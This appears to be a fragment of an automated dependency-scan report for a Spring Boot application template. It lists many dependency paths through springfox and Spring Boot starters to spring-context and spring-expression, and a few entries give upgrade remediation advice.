  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22
